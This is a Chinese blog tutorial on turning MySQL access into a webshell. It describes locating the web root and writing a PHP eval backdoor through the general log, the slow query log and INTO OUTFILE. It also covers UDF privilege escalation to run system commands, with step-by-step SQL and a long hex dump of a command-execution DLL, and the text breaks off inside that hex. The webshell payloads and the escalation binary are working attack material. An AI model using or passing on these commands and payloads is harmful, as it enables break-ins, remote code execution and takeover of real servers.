Mysql Getshell总结

最新推荐文章于 2024-04-02 14:17:25 发布
最新推荐文章于 2024-04-02 14:17:25 发布
阅读量7.7k 收藏 28
点赞数 4
分类专栏: # sql漏洞利用 文章标签: mysql apache 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51478862/article/details/124580957
版权

获取网站根目录方式

(1) phpinfo() 页面:最理想的情况,直接显示web路径
(2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径
(3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径
默认路径

winserver的iis默认路径c:\Inetpub\wwwroot
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocs
xammp 就是...\xampp\htdocs
phpstudy 就是...\PhpStudy20180211\PHPTutorial\WWW\
...\phpstudy_pro\www

查看数据库路径

show variables like '%datadir%';

例如回显:C:\InstalledSoftware\phpstudy_pro\Extensions\MySQL5.7.26\data<br />那么根目录就可以猜为:
C:\InstalledSoftware\phpstudy_pro\www
再猜解web路径的方法,一般容易成功。
若拥有很大的读写权限可以尝试下面方式寻找
(4) 利用select load_file() 读取文件找到web路径:可以尝试/etc/passwd,apache|nginx|httpd log之类的文件。
Trick:如何判断目录是否存在,往往确定了/var/www/html目录,但是还有一层目录不能 确定,可以采用目标域名+常用的网站根目录的方式进行爆破,当使用
select ‘test’ into outfile ‘/var/www/ f u z z fuzz fuzz/shell.php’;
时目录 f u z z fuzz fuzz不存在将会报错Can’t create/write to file ‘/var/www/html/666.txt’ (Errcode: 2);如果存在但是目录写不进去将返回(Errcode: 13);如果使用的
load data infile “/etc/passwd” into table test;
该语句执行后将也会显示文件是否存在,有权限能否写等信息。

一、命令写入shell

前提条件

1、数据库root权限登录
2、知道网站的真实物理路径
3、有数据库读写权限

1.写入常规日志

实战大多利用这个方式写入webshell

前提:

1、知道网站真实物理路径
2、root用户身份
3、MySQL 版本 > 5.0

流程

MySQL版本大于5.0。可以使用日志写入getshell,先查看是否开启日志
SHOW VARIABLES LIKE '%general%'
image.png
命令行开启
set global general_log = "ON";
设置日志路径为网站根目录,并把文件格式修改为相应的后缀名
set global general_log_file ='C:/InstalledSoftware/phpstudy_pro/WWW/58/public/config.php';
使用select写入即可。
select “<?php @eval($_POST[abc]); ?>”;
注意:select后面的引号推荐使用双引号木马代码中若有引号全部改为单引号,防止闭合,否则写入到文件中会出现语法错误
蚁剑连接getshell、MSF上线
image.png
image.png

2.写入慢查询日志

与写入日志流程区别不大

前提:

1、知道网站真实物理路径
2、root用户身份
3、MySQL 版本 > 5.0

流程

查看当前慢查询日志目录
show variables like '%slow%';
修改慢查询日志存储路径

set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';

开启慢查询日志
set GLOBAL slow_query_log="ON";
写入shell

select "<?php @eval($_POST[abc]); ?>" from mysql.db where sleep(5);

3.into outfile

实战作用意义不大,因为默认配置一般为NULL即不允许写入,或者指定某个目录

最常见的SQL语句写入shell,知道物理路径为C:/phpstudy/WWW,select 语句使用into outfile直接写入

前提:

1、对web目录需要有写权限能够使用单引号(root)
2、知道网站绝对路径(phpinfo/php探针/通过报错等)
3、secure_file_priv没有具体值

流程

查看secure_file_priv 参数,该参数是只读参数,不能使用set global命令修改。
show global variables like '%secure%';
如果修改会报错:
#1238 - Variable ‘secure_file_priv’ is a read only variable
该设置初始状态为NULL拒绝写入,或者指定了某一个文件夹
在实战中若是上面两种情况大概率是不行了。

配置设置

开启需要手动在MySQL配置文件my.ini中添加或者修改成:secure_file_priv='' #允许写入到任何文件夹。
修改完将服务重启即可生效
select '<?php eval($_POST["123"]);?>' into outfile 'C:/phpStudy/WWW/muma1.php';
如果语句被转义则可以对物理地址使用双斜线编写如
C:\\phpstudy\\WWW\\muma.php

创建表导入木马

若写入的代码量过多可以新建表然后把内容导出到文件中
新建一个数据表,在此表中插入一句话木马
<?php eval($_POST['123']); ?>'
执行SQL语句将该表中内容导出到指定文件,蚁剑或冰蝎连接即可
select *from muma into outfile 'C:/phpstudy/WWW/muma2.php';
在对目标进行目录扫描时经常会遇到phpMyAdmin,特地总结下phpMyAdmin的利用思路,关于phpMyAdmin的漏洞环境可以参考vulhub,复现过的都忘记截图,请大家见谅。

二,UDF提权

User defined funct ion(UDF)
即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限

前提条件

1.secure_file_priv 无值
plugin 目录可写
2.用户身份是root
3.可以自定义函数(my.ini中的skip-grant-tables选项注释掉。)

要求

MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

获取信息

查看写入权限
show global variables like 'secure%'
secure_file_priv 是用来限制load dumpfile,into outfile,load_file()函数在那个目录下有用上传或者读取文件的权限

show global variables like 'secure%'
	当 secure_file_priv 的值为NULL,表示mysql 不允许导入|导出,此时无法提权
  当 secure_file_priv 的值为 /tmp/,表示限制 mysql 的导入|导出只能发生在/tmp/目录下
  当 secure_file_priv 的值没有具体的值时,例如下图,表示不对mysql的导入|导出做限制,此时可以提权

image.png
查看数据库版本
select version();
image.png
查看系统架构
show variables like '%compile%';
image.png
查看plugin路径
show variables like 'plugin_dir';
image.png
C:\phpstudy\MySQL\lib\plugin\
有时即使上面显示了路径但系统却没有这个文件夹,若没有文件夹,后面生成文件的时候会报错。
若是没有Lib、Plugin文件夹,则需要手工建立,但下面的命令我是没有创建成功。


select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
 
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

udf文件获取

用SQLMAP获取udf
sqlmap udf提权可用的dll文件在/data/udf/mysql 下,注意根据show variables like '%compile%';选取对应的系统文件,
需要采用/extra/cloak.py进行解码操作

python .\cloak.py -d -i ../data\udf\mysql\windows\32\lib_mysqludf_sys.dll_ -o mysqludf.dll

sqlmap中的udf文件提供的函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

把udf文件上传到指定路径

接下来就是利用各种办法上传到网站指定目录下

1.创建表,把内容先填到表中,再导入到一个文件中

先创建udftmp表
create table udftmp (c blob)
使用winHex工具打开刚才生成的文件,ctrl+a全选
ctrl+R修改成十六进制
image.png
然后全部复制下来,在开头加上’0x’
再使用下面格式填到表中,
insert into udftmp values(convert(16进制内容)。
推荐使用可视化工具(Navicat)进行操作数据库,使用cmd命令框复制不了那么多内容。

insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04FF75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BD